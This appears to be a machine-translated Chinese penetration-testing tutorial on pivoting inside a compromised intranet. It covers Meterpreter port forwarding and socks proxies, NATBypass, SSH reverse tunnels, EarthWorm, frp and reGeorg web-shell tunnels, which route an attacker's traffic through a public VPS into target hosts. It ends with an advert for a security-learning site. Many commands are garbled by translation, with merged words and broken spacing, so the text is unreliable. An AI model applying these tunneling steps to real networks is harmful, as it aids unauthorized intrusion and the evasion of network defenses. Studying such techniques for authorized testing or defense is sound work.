内网渗透攻击,内网渗透方法是什么,内网渗透攻防
作者:zjun
原文:https://xz.aliyun.com/t/8001
本文列举了我使用过的内网代理方法,也加强了内网的渗透代理态度,方便以后调查。
Meterpreter Meterpreter可以说是渗透中广泛使用的工具。介绍了内网目标外壳反弹后的两种代理方法。
Portfwd portfwd用于传输单口,是一个很好的方法。例如,如果mydts具有很高的针对性,那么它只需要目标上的3389个端口。
有关使用语法的详细信息,请参阅https://www . offensive-security . com/metasploit-un released/port FWD/
大致如下。
meteterpertportfwdaddl 7003 p 3389 r 192 . 168 . 52 . 138 # transmission-l:服务器接收端口-p:内网主机需要的传输端口-r:目标内网主机ipmeterpretrpertfwddelete-l 3389 p 3389 r 172 . 16 . 194 . r meter preter port FWD Socks代理Socks代理只能在tcp级别,不能代理icmp、arp等。
msf包含三个内置的socks代理模块,即socks4a、socks5和socks_unc。一般使用socks4a和socks5作为代理。两者的不同之处仅在于支持的具体应用。Socks4只支持TCP协议,但socks5支持TCP/UDP协议和各种认证机制。这意味着您还必须在这里设置您的用户名和密码才能使用socks5。
向获取外壳的计算机添加一个根目录。
meteoretrunget _ local _ subnet meterpretrunrenauoutroute-s 192 . 168 . 21 . 0/24 #附加路由meterpreter运行autoroute -p#
首先,用arp扫描内网可以大致挺过机器的状况。
meterpretrunpost/windows/gather/ARP _ scanner rhosts=192 . 168 . 21 . 0/24
然后设置socks4代理,
meterprebackgroundmsf 5 exploit(multi/handler)使用辅助/服务器/socks 4a ms F5辅助))setsrvhost 127.0.0.1 ms F5辅助(服务器/socks 4a ) setsrvport 1080 ms F5辅助(服务器/socks 4a)运行
安装后,proxychains配置成功。
socks5模块也是如此,只是添加了用户名和密码。
参考:
3359 blog.csdn.net/QQ _ 36119192/文章/详情/105872076
klionsec.github.io/2016/09/25/MSF-socks 3359号4a /
NATBypass NATBypass是一个类似于lcx的端口传输工具,叫做golang版lcx,可以编译成linux或者windows版本。
具体原理是公网vps监听两个本地端口,内网目标主机建立一个端口转发。例如,如果本地3389被转发到公共网络vps上的一个端口,vps监听的另一个端口相当于内部网络上的主机3389。
公共网络vps
Nb -listen 1997 2017内部网主机
b-slave 127 . 0 . 0 . 133603389 X . X . X . X:1997 # X . X . X . X是公网vps的IP直接访问公网vps的2017端口。
隧道ssh ssh可以进行端口转发或者建立socks5隧道。
如果具有公共网络地址的主机使用ssh来创建socks5隧道,那么公共网络主机创建socks5隧道就非常简单。
ssh -N -f -D 9070 x.x.x
然后编辑本地/etc/proxychains.conf文件。
代理成功:
配置浏览器代理:
想象一下,当一台公网主机运行在两个内网时,你和目标主机属于不同的内网,无法从外部直接连接。然而幸运的是,两个内部网都可以访问公共网络(JumpHost),所以请考虑在一个公共网络设备中创建两个内部网之间的隧道。
在目标主机上运行:
ssh -qTfNn -R 2222
:本地主机:22 JumpHost
现在登录到公共网络主机执行:
ssh -p 2222本地主机
达到的效果只是将目标主机的端口转发到公网,而没有实现socks代理。想了想,所有尝试都是不成功的。不知是否可行。如果有高手告诉我,我会很感激的!
参考:3359cherrot.com/tech/2017/01/08/ssh-tunneling-practice.html
蚯蚓
简称EW,官方项目已经停止更新,可以在fork地址下载。
有关详细语法,请参阅:http://rootkiter.com/EarthWorm/。
EW非常强大,提供了“正向”、“反向”、“多级级联”的方式打通隧道。比较适合不同的操作系统,比如Linux,Windows,MacOS,Arm-Linux。这里有一个简单的反向代理方法。
公共网络vps执行。/ew _ for _ Linux 64-s RC socks-l 7010-e 7011目标intranet主机执行。 ew _ for _ win . exe-s RS socks-d x . x . x-e 7011 # windows。/ew _ for _ Linux 64-s RS socks-d x . x . x-e 7011 # Linux本地攻击机可以通过proxychains或browser设置socks5代理到公共vps。
注:无意中浏览了这个工具作者的博客,发现了这个工具的新版本。在http://rootkiter.com/Termite/有时间测试它之前,请分享它。
正向补给燃料区(同forward refueling area)
作为frp的反向代理工具,比稳定性好,但是依赖配置文件,容易追溯。
项目地址:https://github.com/fatedier/frp
它可用于端口映射或打开socks隧道。socks隧道代理描述如下。
公共vps主机的frps.ini文件
[common] bind _ port=7000token=密码开始frps。/frps -c ./frps.ini目标intranet主机frpc.ini文件
[common]server _ addr=x . x . x server _ port=7000 token=password[socks 5]type=tcpremote _ port=7004 plugin=socks 5 start frpc。/frpc -c ./frpc.ini本地攻击面可以修改/etc/prxoychains.conf配置文件。
Socks5 x.x.x.x 7004基于web服务的Socks5隧道简单易用,可以用来突破网络限制。常用的工具有:reGeorg、reDuh、Tunna等。
方法大致相同。将网站语言对应的脚本文件上传到目标内网服务器,在本地使用脚本连接建立socks5隧道。
例如,reGeorg:
根据目标服务器的解析语言,选择脚本上传到服务器端,访问显示Georg说,‘一切看起来都很好’,表示脚本运行正常。
本地攻击主机正在运行
python 2 regeorgsocksproxy . py-p 7001-u http://URL/tunnel . PHP
Georg说,监听端口7001,“一切似乎正常”似乎表明运行正常。可以使用prxoychains作为代理。
https://www.secshi.com
学安全,去赛克希。安全师,一个可靠的网络安全学习平台,以高效获取可靠优质内容为己任。安全事业部集合网络安全技术、黑客技术、web安全攻防、代码审计、渗透测试、漏洞挖掘、白帽教程,积累知识,分享经验!吸引和聚集了大量IT行业领域专家,通过人的节点大规模生产和分享优质内容。通过用户分享等沟通方式建立信任和联系,建立和提升个人影响力,发现和获得新的机会。